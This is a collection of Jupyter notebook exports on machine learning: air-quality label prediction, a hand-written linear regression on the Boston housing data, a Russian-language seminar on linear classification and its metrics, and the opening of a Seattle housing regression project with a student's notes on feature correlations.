use labels predicted on all slots to help assist in making decisions ``` # using heuristic method to generate the label good_mask = np.bitwise_and(df.temp_value > 10, df.temp_value < 50) good_mask = np.bitwise_and(good_mask, df.so2_value > 0) good_mask = np.bitwise_and(good_mask, df.so2_value < 0.02) good_mask = np.bitwise_and(good_mask, df.no2_value < 0.03) good_mask.sum(), df.shape df['label'] = np.array(['Good', 'Bad'])[good_mask] %%time # Train a simple model to predict label given sensing record from sklearn import tree label_model = tree.DecisionTreeClassifier() label_model.fit(df[feature_columns], df['label']) label_model.score(df[feature_columns], df['label']) def predict_label(X, scaler, label_model): X_2d = X.reshape(-1, X.shape[-1]) X_2d_unscaled = scaler.inverse_transform(X_2d) X_2d_no_sensing = X_2d_unscaled[:,:len(feature_columns)] return label_model.predict(X_2d_no_sensing).reshape(X.shape[:3]) X_train_label = predict_label(X_train, scaler, label_model) X_test_label = predict_label(X_test, scaler, label_model) y_train_label = predict_label(y_train, scaler, label_model) y_test_label = predict_label(y_test, scaler, label_model) y_train_pred = model.predict(X_train) y_test_pred = model.predict(X_test) y_train_label_pred = predict_label(y_train_pred, scaler, label_model) y_test_label_pred = predict_label(y_test_pred, scaler, label_model) from collections import Counter Counter(y_train_label.ravel()), Counter(y_train_label_pred.ravel()), Counter(y_test_label.ravel()), Counter(y_test_label_pred.ravel()) # assuming that x is scaled def plot_label_map(X, X_label, y_true, y_label_true, y_pred, y_label_pred, idx): data = [ (X, X_label, 'X'), (y_true, y_label_true, 'y_true'), (y_pred, y_label_pred, 'y_pred') ] fig, axes = plt.subplots(1, len(data)) for i in range(len(data)): ax = axes[i] x, y, title = data[i] y_img = (y[idx,...] 
== 'Good').astype(np.float32) y_img[x[idx,...,-1] < x[idx,...,-1].mean()] = np.nan ax.imshow(y_img, interpolation='none') ax.set_title(title) ax.grid(color='w', linestyle='-', linewidth=1) ax.set_xticks(np.arange(-0.5, n_cols+.5, 1)) ax.set_yticks(np.arange(-0.5, n_rows+.5, 1)) ax.set_xticklabels(np.arange(0, n_cols+1, 1)) ax.set_yticklabels(np.arange(0, n_rows+1, 1)) plt.show() # train results for idx in [1,2,5,9,42,50,60,150]: plot_label_map(X_train, X_train_label, y_train, y_train_label, y_train_pred, y_train_label_pred, idx) # test results for idx in [1,2,5,9,42,50, 60, 70]: plot_label_map(X_test, X_test_label, y_test, y_test_label, y_test_pred, y_test_label_pred, idx) ```
github_jupyter
import numpy as np

# --- Simple linear regression (translated from the notebook markdown) ------
# Meaning:  R^2 = share of the variance explained by the model,
#           coef = slope of the fitted line, intercept = y-axis offset.
# Symbols:  x_bar / y_bar = means of x / y, y_hat = model prediction.
# Data:     m samples, n features; x in R^{m,n}, y in R^m;
#           coef, x_bar in R^n; intercept, y_bar in R.
# Formulas: beta = (X^T X)^{-1} X^T y;  coef = beta[1:];  intercept = beta[0]
#           y_hat = X beta
#           R^2  = 1 - sum_i (y_i - y_hat_i)^2 / sum_i (y_i - y_bar)^2


class LinearRegression:
    """Ordinary least squares linear regression via the normal equation.

    Mirrors the core scikit-learn attribute interface:
      - ``coef_``:      slope per feature, shape (n_features,), set by fit()
      - ``intercept_``: bias term (scalar), set by fit()
    """

    def __init__(self):
        self.coef_ = None       # slopes, filled in by fit()
        self.intercept_ = None  # bias, filled in by fit()

    def _add_intercept(self, x):
        """Prepend a column of ones so the bias is learned as beta[0]."""
        intercepts = np.ones(shape=(x.shape[0]))
        return np.column_stack((intercepts, x))

    def fit(self, x: np.ndarray, y: np.ndarray):
        """Estimate coef_ and intercept_ with the closed-form normal equation.

        NOTE(review): uses an explicit matrix inverse, which fails when
        X^T X is singular; ``np.linalg.lstsq`` would be numerically safer.
        Kept as-is to preserve the notebook's exact numerics.
        """
        x = self._add_intercept(x)
        gram = np.dot(x.T, x)
        gram_inv = np.linalg.inv(gram)
        beta = np.dot(np.dot(gram_inv, x.T), y)
        self.intercept_ = beta[0]
        self.coef_ = beta[1:]

    def predict(self, x: np.ndarray):
        """Return y_hat = <coef_, x_i> + intercept_ for each sample in x.

        Kept as a per-sample loop (rather than ``x @ self.coef_``) on
        purpose: callers such as ``plot_regressor`` below pass a plain
        list of scalars for a one-feature model, which matmul rejects.
        """
        return np.array(
            [np.dot(self.coef_.T, xi) + self.intercept_ for xi in x]
        )

    def score(self, x: np.ndarray, y: np.ndarray):
        """Return the coefficient of determination R^2 on (x, y)."""
        y_pred = self.predict(x)
        y_mean = np.mean(y, axis=0)
        ss_res = np.sum((y - y_pred) ** 2)   # residual sum of squares
        ss_tot = np.sum((y - y_mean) ** 2)   # total sum of squares
        return 1.0 - ss_res / ss_tot


if __name__ == "__main__":
    # Notebook driver code (dataset download, fitting, plots). Kept out of
    # import scope so the LinearRegression class can be reused and tested.
    import pandas as pd
    import matplotlib.pyplot as plt
    from sklearn.datasets import load_boston  # NOTE: removed in sklearn >= 1.2
    from sklearn.model_selection import train_test_split

    np.random.seed(42)

    dataset = load_boston()
    df = pd.DataFrame(dataset.data, columns=dataset.feature_names)
    print(dataset["DESCR"])

    # One-feature regression on column 5 (average number of rooms, RM).
    x = dataset.data[:, 5:6]
    y = dataset.target
    x_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.3)

    regr = LinearRegression()
    regr.fit(x_train, y_train)
    r2_score = regr.score(x_test, y_test)
    print(f"Coef: {regr.coef_}")
    print(f"Intercept: {regr.intercept_}")
    print(f"R2-Score: {r2_score}")

    # --- Visualization -----------------------------------------------------

    def plot_regressor(regr, x_test, y_test):
        """Draw the fitted line over a scatter of the test points."""
        x1 = np.min(x) - 1
        x2 = np.max(x) + 1
        y_pred = regr.predict([x1, x2])
        y1, y2 = y_pred
        plt.plot((x1, x2), (y1, y2), color="black")
        plt.scatter(x_test, y_test, color="red")
        plt.show()

    plot_regressor(regr, x_test, y_test)

    def plot_residuals(regr, x_train, y_train, x_test, y_test):
        """Residual plot (prediction error vs. prediction) for train and test."""
        y_pred_train = regr.predict(x_train)
        y_pred_test = regr.predict(x_test)
        min_val = min(np.min(y_pred_train), np.min(y_pred_test))
        max_val = max(np.max(y_pred_train), np.max(y_pred_test))
        plt.scatter(y_pred_train, y_pred_train - y_train, color="blue")
        plt.scatter(y_pred_test, y_pred_test - y_test, color="red")
        plt.hlines(y=0, xmin=min_val, xmax=max_val)
        plt.legend(["Train", "Test"])
        plt.show()

    plot_residuals(regr, x_train, y_train, x_test, y_test)
github_jupyter
# Семинар 4 # Линейная классификация Задача классификации заключается в том, чтобы отнести каждый из объектов выборки к какому-либо классу из данного набора. Более формально, нам нужно построить классификатор - функцию $a \colon X \rightarrow Y$, которая поставит в соответствие каждому объекту $x$ из пространства объектов $X$ какой-либо класс $y$ из пространства ответов $Y$, где в случае $Y$ - это какое-то конечное множество. То есть, если мы рассмотрим какой-то объект выборки $x$, мы должны получить для него ответ $y = a(x)$. Задачи классификации можно поделить на два типа: бинарная классификация и многоклассовая классификация. В задаче бинарной классификации у нас всего лишь два класса, и множество $Y$ содержит всего два элемента. В задаче же многоклассовой классификации классов больше, чем два. Примеры задач бинарной классификации: - пассажиры с Титаника: выжил ли пассажир? (множество $X$ - пассажиры, множество $Y$ - выжил/нет) - отдаст ли клиент кредит банку? (множество $X$ - клиенты, множество $Y$ - отдаст/нет) - является ли отзыв к товару положительным? (множество $X$ - отзывы, множество $Y$ - положительный/отрицательный) Примеры задач многоклассовой классификации: - какое заболевание у пациента? (множество $X$ - пациенты, множество $Y$ - возможные заболевания) - автоматическое распознавание символов в рукописном тексте (множество $X$ - выделенные в тексте символы, множество $Y$ - словарь символов) - к какому жанру относится данный художественный текст? (множество $X$ - тексты, множество $Y$ - жанры) Для того, чтобы познакомиться с задачей классификации на практике, сгенерируем искусственный датасет, состоящий из 500 объектов. Признаков будет два. Целевая переменная принимает два значения: $-1$ и $1$. ``` import matplotlib.pyplot as plt import numpy as np import pandas as pd %matplotlib inline np.random.seed(13) n = 500 X = np.random.normal(size=(n, 2)) X[:250, :] += 0.75 X[250:, :] -= 1 y = np.array([1] * 250 + [-1] * 250) ``` Визуализируем данные. 
Построим диаграмму рассеяния по данным признакам, и обозначим объекты разных классов разными цветами. ``` plt.figure(figsize=(11, 6.5)) plt.scatter(X[y == 1, 0], X[y == 1, 1], cmap='winter', s=100, label='objects of class y = 1') plt.scatter(X[y == -1, 0], X[y == -1, 1], cmap='winter', s=100, label='objects of class y = -1') plt.title('Scatterplot of the generated data') plt.xlabel('feature #1') plt.ylabel('feature #2') plt.legend() plt.show() ``` Перед нами стоит задача - разделить объекты на два класса. На картинке видно, что представители этих классов более-менее отделены друг от друга, и почти не перемешиваются. Но как же решить задачу с помощью машинного обучения? Напомним, что задача заключается в построении алгоритма (функции $a(x)$), который позволит классифицировать **любой** объект из пространства возможных объектов. Есть различные типы моделей машинного обучения, которые позволяют решить данную задачу. Одним из типов моделей являются линейные классификаторы. Их особенность заключается в том, что решение о принадлежности объекта к какому-либо классу принимается на основе **линейной комбинации** его характеристик (значений признаков). Предположим, что в датасете $d$ признаков, то есть каждый объект $x$ имеет $d$ характеристик - $x_1, x_2, \ldots, x_d$. Тогда ответ линейного классификатора будет получаться по следующей формуле: $$ y = f\left(\sum\limits_{j = 1}^d w_jx_j\right), \qquad\qquad (1) $$ где $f$ - какая-то функция, подходящая по смыслу нашей задаче (выдающая конечное множество значений - классов), а $w_j$ - веса классификатора. Понятно, что так как мы можем выбрать любую разумную $f$, мы можем "сдвинуть" параметр функции $f$ на некоторое число $w_0$. Тогда можно переписать формулу $(1)$ следующим образом, добавив еще один вес - $w_0$: $$ y = f\left(w_0 + \sum\limits_{j = 1}^d w_jx_j\right) \qquad\qquad (2) $$ Какую же функцию $f$ мы можем выбрать? 
В задаче бинарной классификации $f$ может быть функцией, которая выдает разные ответы в зависимости от того, какой знак (плюс или минус) имеет рассматриваемое значение: $$ y = \operatorname{sign}\left(w_0 + \sum\limits_{j = 1}^d w_jx_j\right) = \begin{cases} 1, & w_0 + \sum\limits_{j = 1}^d w_jx_j \geq 0 \\ -1, & w_0 + \sum\limits_{j = 1}^d w_jx_j < 0 \end{cases} \qquad\qquad (3) $$ Кстати, если в качестве $f$ выбрать сигмоидную функцию, то получится логистическая регрессия, где на выходе получается вероятность положительного класса: $$ y = \sigma\left(w_0 + \sum\limits_{j = 1}^d w_jx_j\right) = \frac{1}{1 + \exp\left(-w_0 - \sum\limits_{j = 1}^d w_jx_j\right)} $$ Давайте более детально разберем, что мы получили. Приравняем рассматриваемое "сдвинутое" значение линейной комбинации к нулю: $$ w_0 + \sum\limits_{j = 1}^d w_jx_j = 0 \qquad\qquad (4) $$ Это очень похоже на уравнение прямой на плоскости, в котором также есть переменные ($x_1$ и $x_2$), веса ($a$ и $b$) и свободный коэффициент ($c$): $$ ax_1 + bx_2 + c = 0 $$ Формула $(4)$ - это уравнение **гиперплоскости**, что является обобщением прямой на плоскости на пространства любых размерностей. Если говорить строго, прямая является подпространством размерности $1$ пространства размерности $2$ (плоскости), то есть ее размерность на $1$ меньше, чем у исходного пространства. А гиперплоскость - подпространство размерности $d - 1$ пространства размерности $d$. Таким образом, уравнение $(4)$ соответствует гиперплоскости размерности $d - 1$ в пространстве размерности $d$. В таком случае уравнение $(3)$ показывает, **по какую сторону от гиперплоскости лежит объект**. Если объект лежит по одну сторону от гиперплоскости, то он относится к положительному классу, если по другую - к отрицательному. Получается, что данный классификатор строит **разделяющую гиперплоскость**, разделяющую пространство на две области - один класс и другой. Для наглядности разберем случай $d = 2$ на примере сгенерированного ранее датасета. 
Уравнение разделяющей гиперплоскости (прямой) будет выглядеть так: $$ w_0 + w_1x_1 + w_2x_2 = 0 $$ Зададим веса $w_0 = w_1 = w_2 = 1$ и посмотрим на прямую, которая получится в результате. ``` w0 = 1 w1 = 1 w2 = 1 x1 = np.linspace(X[:, 0].min(), X[:, 0].max(), 1000) x2 = (- w1 * x1 - w0) / w2 plt.figure(figsize=(11, 6.5)) plt.scatter(X[y == 1, 0], X[y == 1, 1], cmap='winter', s=100, label='objects of class y = 1') plt.scatter(X[y == -1, 0], X[y == -1, 1], cmap='winter', s=100, label='objects of class y = -1') plt.plot(x1, x2, color='green', label='separating hyperplane') plt.title('Scatterplot of the generated data') plt.xlabel('feature #1') plt.ylabel('feature #2') plt.legend() plt.show() ``` --- Добавим в данные единичный признак. ``` w_init = np.array([1.0, 1.0, 1.0]) X_new = np.c_[np.ones(n), X] print(X_new) ``` Видно, что прямая неплохо разделяет классы. Однако мы сделали только первое предположение о весах гиперплоскости, и оптимальное качество разбиения можно попробовать получить с помощью градиентного спуска. Для этого, как было сделано в лекции, можно выбрать логистическую функцию потерь: $$ \tilde{Q}(w, X) = \frac{1}{\ell}\sum\limits_{i=1}^\ell\log\left(1 + \exp(-y_i\langle w, x_i\rangle)\right) \rightarrow \min_w $$ Здесь $\ell$ - количество объектов в данных (в нашем случае $\ell = 500$), $w$ - вектор весов, $x_i$ - признаковое описание $i$-ого объекта. 
import numpy as np

# For convenience we assume the data contains a constant (all-ones) feature
# matching the bias weight w0, so the left-hand side of equation (4) becomes
# a dot product:  <w, x> = 0.
#
# Gradient of the chosen (logistic) loss:
#   grad_w Q(w, X) = -(1/l) * sum_i  y_i * x_i / (1 + exp(y_i * <w, x_i>))
#
# Gradient-descent update rule:
#   w^(t) = w^(t-1) - eta * grad_w Q(w, X)
#
# Task: implement the loss function and its gradient.


def log_loss(w, X, y):
    """Mean logistic loss over the dataset: mean(log(1 + exp(-y_i * <w, x_i>)))."""
    return np.mean(np.log(1 + np.exp(-(X @ w) * y)))


def log_loss_grad(w, X, y):
    """Gradient of ``log_loss`` with respect to ``w``.

    BUGFIX: the margin must be exponentiated as exp(y_i * <w, x_i>).  The
    previous code computed ``1 + np.exp(X @ w) * y`` (exp of the score, then
    multiplied by the label) due to misplaced parentheses — correct only for
    y_i = +1 and wrong (denominator can become non-positive) for y_i = -1.
    """
    margin = (X @ w) * y
    return -((X * y.reshape(-1, 1)) / (1 + np.exp(margin)).reshape(-1, 1)).mean(axis=0)


def gradient_descent(X, y, w_init, n_steps, eta):
    """Run ``n_steps`` of full-batch gradient descent starting from ``w_init``.

    Returns the final weight vector and the loss after every step
    (including the initial loss, so the list has n_steps + 1 entries).
    """
    w = w_init.copy()
    loss_array = [log_loss(w_init, X, y)]
    for _ in range(n_steps):
        w_grad = log_loss_grad(w, X, y)
        w -= eta * w_grad
        loss = log_loss(w, X, y)
        loss_array.append(loss)
    return w, loss_array


if __name__ == "__main__":
    # (A leftover debug expression that recomputed part of the gradient
    # inline was removed here — it had no effect.)

    # Initial value of the loss function:
    print(log_loss(w_init, X_new, y))

    # Initial gradient of the loss function:
    print(log_loss_grad(w_init, X_new, y))

    # Train the classifier with gradient descent.
    w, loss_array = gradient_descent(X_new, y, w_init, n_steps=1000, eta=0.1)
    print('weights:', w)
    print('loss value:', loss_array[-1])

    # Plot the loss value against the gradient-descent step number.
    plt.figure(figsize=(11, 6.5))
    plt.plot(loss_array)
    plt.title('Loss change during gradient descent')
    plt.xlabel('step')
    plt.ylabel('loss')
    plt.grid()
    plt.show()
    # Next: visualize the result.
``` w w0 = w[0] w1 = w[1] w2 = w[2] x1 = np.linspace(X[:, 0].min(), X[:, 0].max(), 1000) x2 = (- w1 * x1 - w0) / w2 plt.figure(figsize=(11, 6.5)) plt.scatter(X[y == 1, 0], X[y == 1, 1], s=100, label='objects of class y = 1') plt.scatter(X[y == -1, 0], X[y == -1, 1], s=100, label='objects of class y = -1') plt.plot(x1, x2, color='green', label='optimal separating hyperplane') plt.title('Scatterplot of the generated data') plt.xlabel('feature #1') plt.ylabel('feature #2') plt.legend() plt.show() ``` В `sklearn` есть готовая реализация линейного классификатора, который можно обучить с помощью градиентного спуска. ``` from sklearn.linear_model import SGDClassifier clf = SGDClassifier(loss='log', learning_rate='constant', eta0=0.1, random_state=13, verbose=1) # заметьте - в данном случае добавлять единичный признак в датасет не нужно, потому что метод SGDClassifier создаст его сам clf.fit(X, y) y_pred_sgdclf = clf.predict(X) ``` Посмотрим на получившиеся веса при признаках и на свободный коэффициент: ``` clf.coef_, clf.intercept_ ``` Визуализируем результат. ``` w0_clf = clf.intercept_.item() w1_clf = clf.coef_[0][0] w2_clf = clf.coef_[0][1] x2_clf = (- w1_clf * x1 - w0_clf) / w2_clf plt.figure(figsize=(11, 6.5)) plt.scatter(X[y == 1, 0], X[y == 1, 1], s=100, label='objects of class y = 1') plt.scatter(X[y == -1, 0], X[y == -1, 1], s=100, label='objects of class y = -1') plt.plot(x1, x2, color='green', label='optimal separating hyperplane (manual)') plt.plot(x1, x2_clf, color='red', label='optimal separating hyperplane (sklearn)') plt.title('Scatterplot of the generated data') plt.xlabel('feature #1') plt.ylabel('feature #2') plt.legend() plt.show() ``` # Метрики качества классификации Итак, мы получили оптимальный результат с точки зрения градиентного спуска. Однако на данный момент мы измеряли качество по значению логистической функции потерь (чем меньше, тем лучше), которое неочень понятно, как интерпретировать. Можно ли рассмотреть что-то более интерпретируемое? 
import numpy as np

# Task: write a function ``predict_classes`` that returns the predicted
# class (1 or -1) for every object in ``X``.


def predict_classes(X, w):
    """Return the class label (1.0 or -1.0) for each row of ``X``.

    Implements formula (3) from the notebook: class 1 when <w, x> >= 0,
    class -1 otherwise.
    BUGFIX: the previous ``np.sign(X @ w)`` returned 0 for objects lying
    exactly on the hyperplane, which is not a valid class label; such
    objects are now assigned class 1, as formula (3) prescribes.
    """
    return np.where(X @ w >= 0, 1.0, -1.0)


if __name__ == "__main__":
    y_pred = predict_classes(X_new, w)
    print(y_pred[:6], y_pred[-6:])

    # --- Accuracy ----------------------------------------------------------
    # Accuracy is perhaps one of the most basic metrics: the share of
    # correct predictions among all objects:
    #   accuracy(a, X) = (1/l) * sum_i [a(x_i) == y_i]
    from sklearn.metrics import accuracy_score

    print(accuracy_score(y, y_pred))
    print(accuracy_score(y, y_pred_sgdclf))

    # So the algorithm classifies 90.4% of the objects correctly.
    # For a more detailed analysis we can build the confusion matrix:
    #
    #             | y = 1               | y = -1              |
    #   a(x) = 1  | True Positive (TP)  | False Positive (FP) |
    #   a(x) = -1 | False Negative (FN) | True Negative (TN)  |
    from sklearn.metrics import confusion_matrix

    print(confusion_matrix(y, y_pred))

    # In this example the algorithm misclassifies 21 positive-class objects
    # and 27 negative-class objects.  The problem with accuracy is that it
    # ignores the cost of each error type and is misleading on imbalanced
    # data, as discussed in the lecture.  The metrics below let us focus on
    # specific kinds of errors.
### Точность (precision) Точность показывает долю верно предсказанных положительных объектов среди всех предсказаний положительного класса: $$ \text{precision}(a, X) = \frac{\text{TP}}{\text{TP} + \text{FP}} $$ ``` from sklearn.metrics import precision_score precision_score(y, y_pred) ``` ### Полнота (recall) Полнота показывает долю верно предсказанных положительных объектов среди всех положительных объектов в данных: $$ \text{recall}(a, X) = \frac{\text{TP}}{\text{TP} + \text{FN}} $$ ``` from sklearn.metrics import recall_score recall_score(y, y_pred) ``` Точность и полнота в данном случае показывают похожий результат, потому что модель примерно одинаково ошибается в классификации объектов положительного и отрицательного классов. В реальных задачах можно максимизировать точность или полноту в зависимости от того, какой вид ошибок мы не хотим допускать. Однако обычно при максимизации одной из этих метрик значение другой ухудшается. ### F-мера (F-score) F-мера - это метрика, находящая некоторый баланс между точностью и полнотой. Ее значение - это их гармоническое среднее: $$ \text{F-score}(a, X) = 2\frac{\text{precision}(a, X)\cdot\text{recall}(a, X)}{\text{precision}(a, X) + \text{recall}(a, X)} $$ ``` from sklearn.metrics import f1_score f1_score(y, y_pred) # проверим, что формула выше дает такой же ответ 2 * precision_score(y, y_pred) * recall_score(y, y_pred) / (precision_score(y, y_pred) + recall_score(y, y_pred)) ``` Если какой-либо из метрик (точности или полноте) необходимо отдать приоритет, можно использовать взвешенную версию F-меры - с положительным параметром $\beta$: $$ \text{F-score}_\beta(a, X) = (1 + \beta^2)\frac{\text{precision}(a, X)\cdot\text{recall}(a, X)}{\beta^2\text{precision}(a, X) + \text{recall}(a, X)} $$ Если $0 < \beta < 1$, то нам важнее точность. Это легко проверить, устремив $\beta$ к $0$ - в таком случае в выражении выше останется лишь точность. 
Если $\beta > 1$, то нам важнее полнота - проверяется это аналогичным образом, устремлением $\beta$ к бесконечности. ``` from sklearn.metrics import fbeta_score beta = 0.5 fbeta_score(y, y_pred, beta=beta) ``` ### PR-кривая и AUC-PRC Вместо того, чтобы предсказывать один из классов в задаче классификации, можно предсказывать вероятность принадлежности одному из классов. А именно, построить алгоритм $b(x)$, который вместо чисел $1$ и $-1$ будет выдавать вещественное число от $0$ до $1$ - вероятность того, что объект принадлежит классу $1$. Скажем, если $b(x) = 0.98$, то можно заключить, что по мнению алгоритма объект $x$ принадлежит классу $1$ с вероятностью $98\%$. Для того, чтобы из предсказаний затем все же получить один из классов $1$ или $-1$, можно задать порог $t$ и использовать алгоритм $a(x) = [b(x) > t]$. Одной из таких моделей является, например, логистическая регрессия. **Задание:** напишите функцию `predict_probabilities`, которая возвращает вероятность принадлежности к классу `1` для каждого объекта из `X` ``` def predict_probabilities(X, w): prob = 1/(1+np.exp(-(X@ w))) return prob y_pred_prob = predict_probabilities(X_new, w) y_pred_prob[:6], y_pred_prob[-6:] ``` На выходе из `predict_probabilities` получается число от $0$ до $1$, и чтобы получить класс в качестве ответа, можно задать порог $t$ равный, к примеру, $0.5$. 
import numpy as np

# Task: write a function ``threshold`` that turns a vector of predicted
# probabilities into class predictions (1 or -1) using a threshold t.


def threshold(y_pred_prob, t):
    """Map probabilities to class labels: 1.0 where p > t, otherwise -1.0.

    BUGFIX: the previous implementation mutated the array with two masks in
    sequence (first ``arr[arr > t] = 1``, then ``arr[arr <= t] = -1``), so
    for any ``t >= 1`` the entries just set to 1 satisfied the second mask
    and were incorrectly flipped back to -1.  A single ``np.where`` applies
    both conditions to the original values.
    """
    return np.where(y_pred_prob > t, 1.0, -1.0)


if __name__ == "__main__":
    # Evaluate precision/recall at several thresholds (same order and output
    # as the three original notebook cells: 0.5, 0.75, 0.25).
    for t in (0.5, 0.75, 0.25):
        y_pred_t = threshold(y_pred_prob, t)
        print('t =', t)
        print('Precision:', precision_score(y, y_pred_t))
        print('Recall:', recall_score(y, y_pred_t))

    # How do we choose the threshold?  To answer that — and to analyse the
    # classification results in more detail — we can use the PR curve, which
    # shows how the threshold t relates to precision and recall.  Recall is
    # plotted on the x axis and precision on the y axis; for every possible
    # threshold (one per distinct predicted probability in the dataset) we
    # compute precision and recall and mark the point on the plot.
    from sklearn.metrics import precision_recall_curve

    precision_array, recall_array, thresholds = precision_recall_curve(y, y_pred_prob)

    plt.figure(figsize=(11, 6.5))
    plt.plot(recall_array, precision_array)
    plt.title('PR-curve')
    plt.xlabel('recall')
    plt.ylabel('precision')
    plt.show()

    # Suppose we need precision of at least 0.95.  Which threshold should we
    # pick so that recall is optimal?
``` big_precision_idx = np.where(precision_array >= 0.95)[0] big_precision_idx recall_array[big_precision_idx] big_precision_idx[np.argmax(recall_array[big_precision_idx])] t = thresholds[186] y_pred_t = threshold(y_pred_prob, t) print('t =', t) print('Precision:', precision_score(y, y_pred_t)) print('Recall:', recall_score(y, y_pred_t)) f1_score(y, y_pred_t) ``` Площадь под PR-кривой (AUC-PRC) показывает, насколько хорошо классификатор отранжировал объекты. ``` from sklearn.metrics import auc auc(recall_array, precision_array) ``` ### ROC-кривая и AUC-ROC Проанализировать результаты классификации (насколько хорошо алгоритм отранжировал объекты, присвоив им вероятности) также можно с помощью ROC-кривой. Принцип ее построения такой же, как и в PR-кривой - меняя значение порога, считать значения по осям. Только в этом случае по оси $x$ отложен False Positive Rate, по оси $y$ - True Positive Rate (который имеет ту же формулу, что и полнота): $$ \text{FPR} = \frac{\text{FP}}{\text{FP} + \text{TN}} $$ $$ \text{TPR} = \frac{\text{TP}}{\text{TP} + \text{FN}} $$ ``` from sklearn.metrics import roc_curve fpr, tpr, thresholds = roc_curve(y, y_pred_prob) plt.figure(figsize=(11, 6.5)) plt.plot(fpr, tpr) plt.title('ROC-curve') plt.xlabel('False Positive Rate') plt.ylabel('True Positive Rate') plt.show() ``` Площадь под ROC-кривой показывает вероятность того, что случайно выбранная пара объектов, где один из них относится к положительному классу, а другой - к отрицательному, окажется отранжированной правильно с точки зрения вероятностей (алгоритм выдаст бОльшую вероятность в случае объекта положительного класса). ``` from sklearn.metrics import roc_auc_score roc_auc_score(y, y_pred_prob) ``` Как и доля правильных ответов, метрика AUC-ROC может ввести в заблуждение в случае задачи с несбалансированными классами.
github_jupyter
# Project 1: Linear Regression Model This is the first project of our data science fundamentals. This project is designed to solidify your understanding of the concepts we have learned in Regression and to test your knowledge on regression modelling. There are four main objectives of this project. 1\. Build Linear Regression Models * Use closed form solution to estimate parameters * Use packages of choice to estimate parameters<br> 2\. Model Performance Assessment * Provide an analytical rationale with choice of model * Visualize the Model performance * MSE, R-Squared, Train and Test Error <br> 3\. Model Interpretation * Intepret the results of your model * Intepret the model assement <br> 4\. Model Dianostics * Does the model meet the regression assumptions #### About this Notebook 1\. This notebook should guide you through this project and provide started code 2\. The dataset used is the housing dataset from Seattle homes 3\. Feel free to consult online resources when stuck or discuss with data science team members Let's get started. ### Packages Importing the necessary packages for the analysis ``` # Necessary Packages import numpy as np import pandas as pd import matplotlib.pyplot as plt # Model and data preprocessing from sklearn import linear_model from sklearn.model_selection import train_test_split from sklearn.svm import SVR from sklearn.feature_selection import RFE from sklearn import preprocessing %matplotlib inline ``` Now that you have imported your packages, let's read the data that we are going to be using. The dataset provided is a titled *housing_data.csv* and contains housing prices and information about the features of the houses. Below, read the data into a variable and visualize the top 8 rows of the data. 
```
# Initializing seed
np.random.seed(42)

data = pd.read_csv('housing_data.csv')
data.head(8)
```

### Split data into train and test

In the code below, we need to split the data into the train and test for modeling and validation of our models. We will cover the Train/Validation/Test as we go along in the project. Fill the following code.

1\. Subset the features to the variable: features <br>
2\. Subset the target variable: target <br>
3\. Set the test size in proportion to a variable: test_size <br>

```
# Every column except the outcome is a candidate predictor
features = data.drop(columns=['price'])
# The outcome we are trying to model
target = data['price']
test_size = .33

x_train, x_test, y_train, y_test = train_test_split(features, target, test_size=test_size, random_state=42)
```

### Data Visualization

The best way to explore the data we have is to build some plots that can help us determine the relationship of the data. We can use a scatter matrix to explore all our variables. Below is some starter code to build the scatter matrix

```
# Keep the plot handle in its own name so it does not clobber `features`
scatter_axes = pd.plotting.scatter_matrix(data, figsize=(14,8), alpha=1, diagonal='kde')
```

Based on the scatter matrix above, write a brief description of what you observe. In thinking about the description, think about the relationship and whether linear regression is an appropriate choice for modelling this data.

#### a. lot_area

My initial intuitions tell me that lot_area would be the best indicator of price; that being said, there is a weak correlation between lot_area and the other features, which is a good sign! However, the distribution is dramatically skewed-right indicating that the mean lot_area is greater than the median. This tells me that lot_area stays around the same size while price increases. In turn, that tells me that some other feature is helping determine the price because if lot_area were determining the increase in price, we'd see a linear distribution. In determining the best feature for my linear regression model, I think lot_area may be one of the least fitting to use.

#### b.
firstfloor_sqft There is a stronger correlation between firstfloor_sqft and the other features. The distrubution is still skewed-right making the median a better measure of center. firstfloor_sqft would be a good candidate for the linear regression model becuse of the stronger correlation and wider distribution; however, there appears to be a overly strong, linear correlation between firstfloor_sqft and living_area. Given that this linear correlation goes against the Regression Assumption that "all inputs are linearly independent," I would not consider using both in my model. I could, however, use one or the other. #### c. living_area There is a similarly strong correlation between living_area (as compared to firstfloor_sqft) and the other features, but these plots are better distributed than firstfloor_sqft. A right skew still exists, but less so than the firstfloor_sqft. However, the observation of a strong, linear correlation between firstfloor_sqft and living_area (or living_area and firstfloor_sqft) is reinforced here. Thus, I would not use both of these in my final model and having to choose between the two, I will likely choose living_area since it appears to be more well-distributed. #### d. bath Baths are static numbers, so the plots are much less distributed; however, the length and the clustering of the bath to living_area & bath to garage_area may indicate a correlation. Since I cannot use both living_area and firstfloor_sqft, and I think living_area has a better distribution, I would consider using bath in conjunction with living_area. #### e. garage_area Garage_area appears to be well-distributed with the lowest correlation between the other features. This could make it a great fit for the final regression model. It's also the least skewed right distribution. #### Correlation Matrix In the code below, compute the correlation matrix and write a few thoughts about the observations. 
In doing so, consider the interplay in the features and how their correlation may affect your modeling. The correlation matrix below is in-line with my thought process. Lot_area has the lowest correlation between it and the other features, but it's not well distributed. firstfloor_sqft has a strong correlation between it and living_area. Given that the correlation is just over 0.5, both features may be able to be used in the model given that the correlation isn't overly strong; however, to be most accurate, I plan to leave out one of them (likely firstfloor_sqft). living_area also reflects this strong correlation between it and firstfloor_sqft. Surprisingly, there is a strong correlation between living_area and bath. Looking solely at the scatter matrix, I did not see this strong correlation. This changes my approach slighltly, which I will outline below. garage_area, again, has the lowest correlations while being the most well-distributed. #### Approach Given this new correlation information, I will approach the regression model in one of the following ways: 1. Leave out bath as a feature and use living_area + garage_area. 2. Swap firstfloor_sqft for living_area and include bath + garage area. #### Conclusion I'm not 100% sure if more features are better than less in this situation; however, I am sure that I want linearly independet features. ``` # Use pandas correlation function x_train.corr(method='pearson').style.format("{:.2}").background_gradient(cmap=plt.get_cmap('coolwarm'), axis=1) ``` ## 1. Build Your Model Now that we have explored the data at a high level, let's build our model. From our sessions, we have discussed both closed form solution, gradient descent and using packages. In this section you will create your own estimators. Starter code is provided to makes this easier. #### 1.1. 
